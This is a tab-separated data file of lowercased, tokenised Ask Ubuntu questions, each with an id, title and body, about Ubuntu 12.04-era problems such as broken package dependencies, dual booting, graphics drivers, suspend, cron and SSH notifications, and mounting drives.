179800	repair broken packages- '' dpkg : error : conflicting actions -f ( -- field ) and -r ( -- remove ) ''	ubuntu 12.04 lts . if more information will be needed , tell me and 'll give . the main problem is : tzach @ tzach-pc : ~ $ sudo apt-get install docky [ sudo ] password for tzach : reading package lists ... done building dependency tree reading state information ... done docky is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : ca-certificates-java : depends : openjdk-6-jre-headless ( > = 6b16-1.6.1-2 ) but it is not going to be installed or java6-runtime-headless openjdk-7-jre-lib : depends : openjdk-7-jre-headless ( > = 7~b130~pre0 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . tzach @ tzach-pc : ~ $ and also : tzach @ tzach-pc : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . **the following packages have unmet dependencies : ca-certificates-java : depends : openjdk-6-jre-headless ( > = 6b16-1.6.1-2 ) but it is not installed or java6-runtime-headless openjdk-7-jre-lib : depends : openjdk-7-jre-headless ( > = 7~b130~pre0 ) but it is not installed e : unmet dependencies . try using ******* so we tryied the guide here in messege # 9 : http : //ubuntuforums.org/showthread.php ? t=947124 we run all the first 4 commands and the last one- '' sudo apt-get autoremove '' gave us : tzach @ tzach-pc : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : **ca-certificates-java** : depends : openjdk-6-jre-headless ( > = 6b16-1.6.1-2 ) but it is not installed or java6-runtime-headless **openjdk-7-jre-lib** : depends : openjdk-7-jre-headless ( > = 7~b130~pre0 ) but it is not installed e : unmet dependencies . try using -f. so we run the last command twice : sudo dpkg -- remove -force -- force-remove-reinstreq ca-certificates-java and sudo dpkg -- remove -force -- force-remove-reinstreq openjdk-7-jre-lib but both of them gives : tzach @ tzach-pc : ~ $ sudo dpkg -- remove -force -- force-remove-reinstreq ca-certificates-java [ sudo ] password for tzach : dpkg : error : conflicting actions -f ( -- field ) and -r ( -- remove ) type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through `less ' or `more ' ! edit for green7-output of `` sudo apt-get -f install '' : tzach @ tzach-pc : ~ $ sudo apt-get -f install [ sudo ] password for tzach : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : icedtea-7-jre-cacao icedtea-7-jre-jamvm java-common openjdk-7-jre-headless tzdata-java suggested packages : default-jre equivs sun-java6-fonts ttf-dejavu-extra fonts-ipafont-gothic fonts-ipafont-mincho ttf-telugu-fonts ttf-oriya-fonts ttf-kannada-fonts ttf-bengali-fonts the following packages will be removed : ttf-mscorefonts-installer the following new packages will be installed : icedtea-7-jre-cacao icedtea-7-jre-jamvm java-common openjdk-7-jre-headless tzdata-java 0 upgraded , 5 newly installed , 1 to remove and 355 not upgraded . 5 not fully installed or removed . need to get 0 b/29.6 mb of archives . after this operation , 88.5 mb of additional disk space will be used . do you want to continue [ y/n ] ? y debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : warning : there 's no installed package matching ttf-mscorefonts-installer : amd64 setting up tzdata ( 2012e-0ubuntu0.12.04 ) ... debconf : dbdriver `` config '' : /var/cache/debconf/config.dat is locked by another process : resource temporarily unavailable dpkg : error processing tzdata ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : tzdata e : sub-process /usr/bin/dpkg returned an error code ( 1 ) edit2 for green7 : tzach @ tzach-pc : ~ $ sudo apt-get remove -- purge tzdata [ sudo ] password for tzach : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : ca-certificates-java : depends : openjdk-6-jre-headless ( > = 6b16-1.6.1-2 ) but it is not going to be installed or java6-runtime-headless libc6 : depends : tzdata but it is not going to be installed libc6 : i386 : depends : tzdata : i386 libical0 : depends : tzdata but it is not going to be installed openjdk-7-jre-lib : depends : openjdk-7-jre-headless ( > = 7~b130~pre0 ) but it is not going to be installed python-dateutil : depends : tzdata but it is not going to be installed ubuntu-minimal : depends : tzdata but it is not going to be installed util-linux : depends : tzdata ( > = 2006c-2 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . edit3 for green7 : tzach @ tzach-pc : ~ $ sudo apt-get install openjdk-7-jre-headless [ sudo ] password for tzach : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : openjdk-7-jre-headless : depends : tzdata-java but it is not going to be installed depends : java-common ( > = 0.28 ) but it is not going to be installed recommends : icedtea-7-jre-cacao ( = 7~u3-2.1.1~pre1-1ubuntu3 ) but it is not going to be installed recommends : icedtea-7-jre-jamvm ( = 7~u3-2.1.1~pre1-1ubuntu3 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . some things in the text also supposed to be bolded . but not critic ( : thanks for the editing ! thanks a lot for your assistance .
179801	where are laptop keyboard drivers found ?	i have a toshiba satellite intel centrino duo laptop running ubuntu 12.04 what files are responsible for the keyboard working / where are the keyboard drivers located ? say hypothetically the caps lock light does n't light up and pressing a key does nothing and i needed to install `` drivers '' to get it working ... where would those drivers go ? /lib/modules ? /proc ? where ?
179807	difference between update manager and apt-get dist-upgrade	is the update manager ( or software updater ) the frontend of apt-get dist-upgrade ?
179810	system blacks out when resuming on opening lid	it is happening now and then but frequently these days . my system e420 lenovo thinkpad running 12.04 lts blacks out and does n't respond when woke up from sleep by opening the lid . i then have to forcibly press the start button and restart the entire system which is creating a headache for me . please suggest a way to overcome this problem . main characteristics leading to this that i have noticed are : when a video is paused before i suspend the system when eclipse or pgadmin is running before suspending the system
179812	can i install ubuntu on my system ?	the capacity of my hard drive 500gb and i have 1gb of ram . can i install ubuntu 12.04 and windows 7 on my system as dual boot ?
179816	after upgrade to ubuntu 12.04.1 the screen is black	i 've upgraded my ubuntu 10.04 64 bit to 12.04.1 . when i restart the laptop and select ubuntu ( i have windows 7 also ) ; the screen becomes black . i enter the password and login to ubuntu and i still do n't see anything . my notebook is acer 5736z . processor : dual core pentium t4500 . graphics card : intel express ( gma 4500m ) . 3gb ram thank you for help
179820	free up memory dump of all the terminated processes	i think my subject is pretty spot on . i am on ubuntu 10.04 and have the following specs in my computer : i5 processor with 3.30ghz 16gb memory 1tb hard drive 1 gigabyte on board network i am running 10 users at the same time , as virtual computers ( terminals ) from ncomputing . i am using around max 8 - 10 gb memory when computer is running at the fullest . i have the following applications that all the 10 users use simultaneously : firefox libreoffice thunderbird many other folders lot of printing around 8am - 15:00pm , my computer ( actually server ) is running absolutely fine , then around 15:00 - 14:30 upon leaving , the computer just freezes for not reason , without giving warnings . i have to force the computer of by the powers , ca n't even use the reset button . i was told from the ncomputing hadrware/software people , that i should do a memory dump of all the terminated processes for each user that are working - that will be 10 users . i do i do that , freeing up memory dumps , and should i even experience anything like it ? look at how strong , and fast my computer is , can that even be then a problem ? any help ?
179822	problem with ubuntu and uefi ( problem with any linux os )	i have purchased a new sony vaio laptop and it is said that the windows in the recent laptops is installed in the uefi mode . but all the linux os are installed in default in legacy mode . when i reboot my laptop , ubuntu is not being detected on boot . only windows is detected . to access ubuntu , whenever i boot the system , i need to : ( 1 ) enter the boot menu , ( 2 ) change the mode to legacy , and ( 3 ) type a bit of scary commands in grub then ubuntu successfully opens . this is a bit of problem for me . so i wanted to know the solution for this problem . so please kindly look over my problem as soon as possible .
179831	how to create a ppa package from existing launchpad source package ?	there a source package for ruby1.9.1 versioned 1.9.3.194-1 on launchpad.net , at : https : //launchpad.net/debian/sid/+source/ruby1.9.1/1.9.3.194-1/ how do i upload this to my ppa and compiling it for lucid ? these are the steps i did so far : $ pull-lp-source ruby1.9.1 1.9.3.194-1 pull-lp-source : downloading ruby1.9.1 version 1.9.3.194-1 pull-lp-source : downloading ruby1.9.1_1.9.3.194.orig.tar.gz from archive.ubuntu.com ( 11.856 mib ) pull-lp-source : downloading ruby1.9.1_1.9.3.194-1.debian.tar.gz from archive.ubuntu.com ( 0.049 mib ) dpkg-source : info : extracting ruby1.9.1 in ruby1.9.1-1.9.3.194 dpkg-source : info : unpacking ruby1.9.1_1.9.3.194.orig.tar.gz dpkg-source : info : unpacking ruby1.9.1_1.9.3.194-1.debian.tar.gz ... now i wanted to upload it into my ppa , but there is no .changes file , so it is impossible . i tried using debuild -s but it tries to sign using someone else key , so that is a dead end as well ... how can i easily upload this ( already existing ) source package into my ppa for ubuntu lucid 64bit ?
179833	can not install programs with apt-get or software center	if i try sudo apt-get install mc or sudo apt-get install fortune , i get e : unable to locate package mc or e : unable to locate package fortune . also in ubuntu software center : use this source is disabled . internet works and wget gets from internet .
179840	using portable mode for true crypt for crypting portable hdd , usb etc	i was wondering how to encrypt my external hdd so that my data would be safe and accessible from any os platform ( windows and linux ) . so i went through many posts and forums and found out the best thing was to use true crypt . i went along with this post and encrypt my usb drive . when inserted that , windows did n't recognize it . then i followed another post that said to install truecrypt . the thing is : how can i use traveler disk setup in ubuntu ( option not found ) ? install truecrypt in usb so that i can *mount my usb or hdd on any other os ? if there is no solution for the upper two , then is there any other software which i can use to encrypt an usb device so that it can be accessed from any os ?
179841	alt+f2 set to `` activities '' view in gnome shell , ca n't access the command prompt anymore	today i discovered that my gnome-shell does n't let me run commands using alt+f2 anymore . both keys are now bound to the activity view , just like the left super key ( super_l ) . the show the run command prompt preference in the keyboard shortcuts system panel is already set to alt+f2 , but this seems to make no difference . as a result i have no way now to invoke the command prompt for the shell and i wonder if somebody else has the same problem . i stumbled into this weird behavior trying to configure the right super key to work as the left one and open the activity view . that effect proved impossible to achieve and super_r keeps doing nothing for me .
179853	new install ubuntu 12.04	i install ubuntu 12.04 and obtain the message : the system is running in low graphics mode your screen , graphics card and input device settings could not be detected correctly you will need to reconfigure these yourself . my graphics card is an ati mobility radeon hd 5470 resolution : 1600x900 refresh rate : 60hz lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880m [ mobility radeon hd 4200 series ] 02:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati manhattan [ mobility radeon hd 5400 series ] /etc/x11/xorg.conf bash : /etc/x11/xorg.conf : aucun fichier ou dossier de ce type could someone please help me to reconfigure ? i am now using the default ( generic ) configuration . i am based in france and speak better french than english .
179855	how do i *temporarily* change the *console* keymap to dvorak ?	i type dvorak , but i do n't like to confuse other users by having it be a system-wide default . i have a script that runs setxbmap dvorak that i can call when i want dvorak and likewise another script that runs setxbmap us when i want qwerty . for x , that 's fine . how do i get this behavior in the real console ( ctrl-alt-f3 ) ? i.e . how can i change the console keymap to dvorak without setting a system-wide default . having to sudo to do it is fine , but it ca n't be the default keymap for any console user . resources like this and this seem to be explaining how to permanently alter the system but i need to change it on the fly temporarily . in bsd this was possible by using wsconsctl .
179857	uninstalling windows	would it be safe to uninstall windows xp on my computer and just boot to ubuntu ? i am using an older computer with a 40 gig hd , 3gb processor and just under 2 gb ram . i do not have much space left on my drive . if can be don
179858	32-bit ubuntu 12.04 , vim not able to add numbers using c-a	in vim , on a 32-bit system , when i try to add by hitting control-a to any number more than 10-digits , vim does not add up properly . on a 64-bit system with the same settings ( same vim version , etc . ) the addition can take place up to 20 digits , but breaks beyond that . is this because of 32-bit , 64-bit operating system ? is there a workaround ?
179865	how do i change the mime type for a file ?	i have a file that is formatted as a .doc , but nautilus and libreoffice insists that it is a .txt . both precise and ubuntu 12.10 are that way , but google docs can convert it ( after playing with it ) .
179866	can i make the running process to be visible ?	i 'm doing this : sudo unattended-upgrade . it is running and its showing blank screen . it is taking time . i just want the process to been seen visibly ( i.e it downloads and other stuffs ) . is that possible with any command ?
179869	new version of skype does not work as expected , how to install the older version ?	new version of skype 4.0.0.8 does not work as expected , how to install the older version ? please help me , new version of skype really has many bugs in it , i want to use older version which is much simpler , but much more convenient . thank you very much .
179872	installing debian package through synaptic	i want to install a .deb file . after going through various questions , i came across these three options : dpkg , gdebi and ubuntu software center . however , i want to install the . deb file via synaptic package manager only . is there any method by which i can install . deb file as well as all it 's dependencies via synaptic package manager ?
179877	ubuntu desktop not responsive programs take ages to launch when clicked . aspire one happy notebook	i have done a few updates on ubuntu 12.04 which was installed via the wubi installer . the aspire one happy notebook dual boots with windows 7 basic . now ubuntu desktop not responsive programs take ages to launch when clicked . i have checked the drivers with jockey and all seems ok . i 've also installed other desktop managers , like xubuntu and kde and tried gnome classic . no matter what i use . it 's the same sluggish response . aspire one happy notebook specs . cpu~single core intel atom cpu n450 ( -ht- ) clocked at min:1000.000mhz max:1666.000mhz kernel~3.2.0-29-generic i686 up~20 min mem~569.0/991.0mb hdd~250.1gb ( 45.3 % used ) procs~160 client~shell inxi~1.8.4 graphics : card : intel n10 family integrated graphics controller x.org : 1.11.3 drivers : intel ( unloaded : fbdev , vesa ) resolution : 1024x600 @ 60.0hz glx renderer : mesa dri intel igd x86/mmx/sse2 glx version : 1.4 mesa 8.0.2 .
179883	mouse stops clicking after using wacom tablet in ubuntu 12.04	i have a pretty old wacom tablet ; a graphire 4 and it seemed to work well but i 've encountered a problem where i start using it in photoshop , gimp or mypaint ( or even just hovering the stylus over , i believe . ) and suddenly after a while , but most of the time immediately , i ca n't click anywhere on the screen . nothing responds and that goes for the normal mouse as well . sometimes i will notice that the hover effects on docks and other stuff are still active and my short-cut keys for my keyboard still work so i know the system is not locked up . i 've tried restarting unity and compiz and it fixes the problem for about 5 seconds before the mouse stops working again even without using the tablet . the only solution so far is to reboot and not use the tablet . this is a really important thing for me so any help would be greatly appreciated .
179887	after flash player update , videos speeds up on youtube	as stated in the title , the videos which i was watching with normal speed , now i see with x2 the speed or even more . i was so excited that there was a flash player update and now ( like always ) it does n't work properly . i tried reinstalling flash but it did n't work .
179889	how do i set up an email alert when a ssh login is successful ?	does anyone have a bash script that will email or notify someone in the case of a successful login to a ssh server ? i want to be notified if anyone logs into my personal box . i 'm using ubuntu 12.04 running xfce
179890	haw can i take snapshots from a live stream in command line ?	i have a security camera and i would like to take snapshots each 5-10 minutes using cron jobs , but i could fined any command line tools , i tried the following : avconv -i rtsp : //ip:554/h264_2 -r 1 -s wxh -f image2 foo.jpeg but the avconc does n't support rtp/rtsp [ null @ 0x139d940 ] interleaved rtp mode is not supported yet.estimating duration from bitrate , this may be inaccurate
179892	how to get suspend mode working ?	i have a sony vaio vpcf11c5e notebook and ubuntu 12.04 , but my suspend mode is not working . every time when i try to start the suspension mode , the notebook goes into the suspension mode . when i try to wake the notebook up , it does a normal start . does anybody have an idea what i can do to fix that ?
179893	what packages/programs should i install to get better graphics and performance on gaming ?	so , i want to install some packages/programs to get better graphics and performance while playing a game on ubuntu 11.10 . what packages/programs you guys recommend to me ?
179898	how to round decimals using bc in bash ?	a quick example of what i want using bash scripting : # ! /bin/bash echo `` insert the price you want to calculate : '' read float echo `` this is the price without taxes : '' echo `` scale=2 ; $ float/1.18 '' |bc -l read -p `` press any key to continue ... '' bash scriptname.sh assuming that the price is : 48.86 the answer will be:41.406779661 ( 41.40 actually because i 'm using scale=2 ; ) my question is : how i round the second decimal to show the answer in this way ? : 41.41
179902	ubuntu 12.04 dvd images and debian-installer	the ubuntu 12.04.1 ( precise ) desktop dvd image for the i386 architecture does not seem to include debian-installer , the alternative text-mode installation option . why so ? in 10.04 ( lucid ) the dvd used to include both the graphical and the text-mode installers . any references to discussions in mailing lists or in the development wiki are welcome .
179903	what is the ubuntu cloud archive ?	reading the announcement here , i did n't understood the part here the ubuntu cloud archive also makes its debut - essentially an online software repository from which administrators can download the latest versions of openstack for use with the latest long-term support ( lts ) release of ubuntu . what exactly does it mean and where is it deployed or used .
179916	fewest steps to partition a post-install added harddisk ?	i have added 1 tb harddisk my system already has ubuntu 11.10 on another drive , and i need a quick partitioning of the 1tb hdd from linux : an 150 gb partition the rest just free . how can i do that in a few steps ? edit : gparted does the fastest job if you like gui ! for console : fdisk !
179918	context switches much slower in new linux kernels	we are looking to upgrade the os on our servers from ubuntu 10.04 lts to ubuntu 12.04 lts . unfortunately , it seems that the latency to run a thread that has become runnable has significantly increased from the 2.6 kernel to the 3.2 kernel . in fact the latency numbers we are getting are hard to believe . let me be more specific about the test . we have a program that has two threads . the first thread gets the current time ( in ticks using rdtsc ) and then signals a condition variable once a second . the second thread waits on the condition variable and wakes up when it is signaled . it then gets the current time ( in ticks using rdtsc ) . the difference between the time in the second thread and the time in the first thread is computed and displayed on the console . after this the second thread waits on the condition variable once more . so , we get a thread to thread signaling latency measurement once a second as a result . in linux 2.6.32 , this latency is somewhere on the order of 2.8-3.5 us , which is reasonable . in linux 3.2.0 , this latency is somewhere on the order of 40-100 us . i have excluded any differences in hardware between the two host hosts . they run on identical hardware ( dual socket x5687 { westmere-ep } processors running at 3.6 ghz with hyperthreading , speedstep and all c states turned off ) . we are changing the affinity to run both threads on physical cores of the same socket ( i.e. , the first thread is run on core 0 and the second thread is run on core 1 ) , so there is no bouncing of threads on cores or bouncing/communication between sockets . the only difference between the two hosts is that one is running ubuntu 10.04 lts with kernel 2.6.32-28 ( the fast context switch box ) and the other is running the latest ubuntu 12.04 lts with kernel 3.2.0-23 ( the slow context switch box ) . have there been any changes in the kernel that could account for this ridiculous slow down in how long it takes for a thread to be scheduled to run ?
179919	how do i access ubuntu filesystem from windows on dualboot ?	i am dual-booting ubuntu and windows . when i 'm in ubuntu , the windows partition is automatically mounted and i can browse it easily . however , when i 'm in windows i ca n't see the ubuntu partition . how can i access it from windows ?
179923	ubuntu 12.04 randomly crashes after installing latest updates	installed ubuntu 12.04lts on a clean hdd on the day it was first released and it was running very stable up until some recent updates in mid august . after these updates ( all installed successfully ) the system became unstable and it is now randomly freezing . when it hangs it does not respond to keyboard or mouse commands ( no ctrl+alt+sysrq+reisub ) . the only way around is a hard reset . i 'd installed two major cumulative update packages , both over 100mb and have no idea which individual component is causing the problem . system details : amd athlon 64 3400+ cpu on abit nf8 motherboard , ati cga-956tvd graphics card and 2gb ram . the o/s is 32-bit . i 'm trying to avoid a complete reinstall , so any advice would be very much appreciated .
179927	bootscreen selections	re : 12.04 on dual boot . i get a screen box with a few selections . the only one that works best is this : generic 3.2.0.29-pae recovery mode . the regular selection just linux , if selected , i do not get a screen desktop that shows everything such as on the left side launcher column with the icons . also , other selection is linux previous versions and last is win xp . any ideas on this ?
179930	ubuntu software centre not opening	while trying to install ubuntu restricted extras package from the ubuntu software-center , it suddenly crashed . and after typing `` software-center '' in terminal , it is showing : 2012-08-24 20:55:20,221 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2012-08-24 20:55:20,327 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2012-08-24 20:55:20,362 - softwarecenter.db.database - error - failed to add apt-xapian-index traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/database.py '' , line 179 , in _get_new_xapiandb softwarecenter.paths.apt_xapian_index_db_path ) file `` /usr/lib/python2.7/dist-packages/xapian/__init__.py '' , line 3666 , in __init__ _xapian.database_swiginit ( self , _xapian.new_database ( *args ) ) databaseopeningerror : could n't stat '/var/lib/apt-xapian-index/index ' ( no such file or directory ) 2012-08-24 20:55:21,118 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 242 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 145 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/in.archive.ubuntu.com_ubuntu_dists_precise-updates_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . 2012-08-24 20:55:23,234 - softwarecenter.db.categories - warning - sort by cataloged time requested but your a-x-i does not seem to support that yet 2012-08-24 20:55:24,252 - softwarecenter.db.categories - warning - sort by cataloged time requested but your a-x-i does not seem to support that yet 2012-08-24 20:55:24,375 - softwarecenter.db.categories - warning - sort by cataloged time requested but your a-x-i does not seem to support that yet 2012-08-24 20:55:24,445 - softwarecenter.db.categories - warning - sort by cataloged time requested but your a-x-i does not seem to support that yet 2012-08-24 20:55:24,511 - softwarecenter.db.categories - warning - sort by cataloged time requested but your a-x-i does not seem to support that yet 2012-08-24 20:55:24,792 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 262 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in < module > app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1341 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1271 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 149 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 165 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 240 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 491 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 267 , in _build_homepage_view self._append_top_rated ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 404 , in _append_top_rated top_rated_cat = self._update_top_rated_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 391 , in _update_top_rated_content docs = top_rated_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 262 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' i am a beginner and do n't know what to do about it .
179934	is it possible to mount windows drive in ubuntu and make it writeable ?	running ubuntu 12.04 . i have windows server running in vbox ... i can mount the windows drive just fine , but no matter what i try i ca n't get it mount writeable . the latest attempt looks something like this ... sudo mount -t cifs -o user , rw , username=username , password=password //192.168.1.20/websites /media/websites the mount works just fine , but everything is readonly . any advice would be appreciated .
179936	missing icon-size slider from settings > appearance	i 've found a bunch of dead-end threads on the subject , but have n't found any concrete answers yet . in my 12.04 appearance , there 's no slider bar to adjust sizes of icons on launch bar . any suggestion/redirection would be appreciated , thank you .
179938	ntfs drive show in fdisk -l not when i run blkid unable to mount drive	i am unable to see a 750gb drive that is attached to my 12.04 machine using a usb 2.0 drive mate . the drive was pulled out of a windows 7 machine and i am just trying to get all of the information off of it so i can wipe it and start over . fdisk -l shows disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0000183e device boot start end blocks id system /dev/sda1 * 2048 480094207 240046080 83 linux /dev/sda2 480096254 488396799 4150273 5 extended /dev/sda5 480096256 488396799 4150272 82 linux swap / solaris note : sector size is 4096 ( not 512 ) disk /dev/sdb : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 11400 cylinders , total 183143646 sectors units = sectors of 1 * 4096 = 4096 bytes sector size ( logical/physical ) : 4096 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x07f2837e device boot start end blocks id system /dev/sdb1 63 208844 835128 de dell utility /dev/sdb2 * 212992 41172991 163840000 7 hpfs/ntfs/exfat /dev/sdb3 41172992 1465147119 1400929216 7 hpfs/ntfs/exfat sudo blkid sudo blkid /dev/sda1 : uuid= '' dd81fbe4-0659-4eb8-9ef2-f4851ed6ff3e '' type= '' ext4 '' /dev/sda5 : uuid= '' 1cb1a836-7896-4537-9e31-2cacc1a9250b '' type= '' swap '' /dev/sr0 : label= '' monsters , inc. '' type= '' udf '' sudo mount -t ntfs /dev/sdb /media/windows ntfs signature is missing . failed to mount '/dev/sdb ' : invalid argument the device '/dev/sdb ' does n't seem to have a valid ntfs . maybe the wrong device is used ? or the whole disk instead of a partition ( e.g . /dev/sda , not /dev/sda1 ) ? or the other way around ? i am unsure as to why this is not working any help would be greatly appreciated .
179939	shift key on bluetooth keyboard wo n't work	the shift key on my bluetooth keyboard wo n't work . it is especially annoying when typing passwords . i have a rocketfish bluetooth keyboard . i remember fixing this problem but i 'm not sure how .
179943	getting notified of failed cron jobs	i 'm concerned that cron jobs can fail silently for an indefinite period of time on vanilla ubuntu desktop 12.04.1 ( precise ) , and no one will notice . i would like to get a notification whenever a system cron job prints some output or just fails . i know it is possible to install a mail server ( e.g . postfix ) , configure it for local-only delivery , set up an alias so that root 's mail is delivered to my normal user account and configure a mail client to check my local mailbox . are there any lightweight alternatives to this solution in ubuntu ?
179945	how can i get multi-threaded sound back again ?	my sound set up used to be able to handle sounds from different applications simultaneously . currently , though , if one application is playing a sound , it takes exclusive control of the sound device . if i try playing any sound from a second application , that second application is likely to freeze . sometimes the first application will freeze or crash too . there has been no hardware changes at all so i assume simultaneous sounds is still possible . there have been various software upgrades and configuration settings over time , but i could n't say when in all of that i lost the capacity for simultaneous sounds . my system has a computer running mythbuntu that acts as a pulseaudio sound server . it has a usb digital sound system attached to it . all computers on my network send sound over the lan to that machine , and so any sounds from any computer come out of the same speakers . where should i be looking in order to troubleshoot this problem of no longer being able to handle simultaneous sounds ?
179946	hdmi not working on gma500	i have a dell mini 1010 ( wich has a gma500/poulsbo video card ) with ubuntu 12.04 , everything works fine except the hdmi output . when i plug in a hdmi cable just nothing happens . when i look at the screen settings it says that thereâ´s just one screen : the default laptop screen . could someone help me to fix this problem ? ? thanks !
179950	how do i get 12.04.1 to appear on the update manager	i have received the announcement that 12.04.1 lts has been released today . i have followed various instructions to upgrade to it , but nowhere does it appear on the update manager . or has it not actually been released ? running 12.04 on vmware fusion 4.1.3 on mac os 10.7.4
179951	how do i make super+w show open windows from all workspaces ?	i know there is a bug in 12.04 which makes the super+w shortcut only show open applications/programs from the current workspace , not all workspaces like it should . is there a workaround until this bug is fixed ? note : this is not off-topic or a duplicate of this closed question because a workaround now exists .
179955	/var/lib/apt/lists huge in 12.04	i noticed that /var/lib/apt/lists is huge . it 's as large as 86mb . which seems a little too big . is this normal , if not . what should i do ? thanks
179957	where can i find the ubuntu drivers for a dell 1700 printer .	i have hewlett packard compaq d230 pc running ubuntu desktop 12.04 lts 32 bit . i have a dell 1700 printer and i want to download the corresponing drivers and utilities for it . could someone give me the correct link to download them ? the dell website , only has windows operating systems listed in their download section . http : //www.dell.com/support/drivers/uk/en/ukdhs1/product/dell-1700n ? s=dhs
179958	how do i find out my motherboard model ?	is there a way to find what motherboard model i have ? if yes , how , please ?
179961	usb stick too slow to benchmark ?	i have a core 2 duo t8100 @ 2.1ghz with 3gb ram . after some time using xubuntu 10.10 on an 8gb stick i decided to switch to 12.04 and put it onto a 32gb stick ( transcend ) . i use an ext4 with no journalling , noatime etc set . /tmp and /run is using tmpfs . and it is really slow . much slower than the old xubuntu on the 8gb stick . starting takes minutes , all applications `` fade '' because they respond too slow . i first thought that the nvidia graphics card is responsible for this , because there seem to be some known problems with that . doing the adjustment ( uncheck the sync checkbox ) did not help . i believe the root cause is that the access to the usb stick is extremely slow . running the read benchmark of the disk utility then brought the message `` disk is too slow to benchmark '' ! but : when i do the same benchmark with the live cd i get around 20mb read performance and have a very responsive system ! so how can i find out what is going one here ?
179963	ca n't play nightskyhd because file-type is unknown	i 've only been using ubuntu for a day now , so bear with me here . i downloaded nightskyhd from the humble indie bundle website and it 's now in my downloads folder . i open my downloads folder , click on the `` nightskyhd-linux-1324519044.tar.gz '' folder and see that the file type for nightskyhd is unknown . in windows , the file would be `` .exe '' . am i missing an application or something that lets me play games ? did i download the wrong file from the hib website ? any help at all is appreciated .
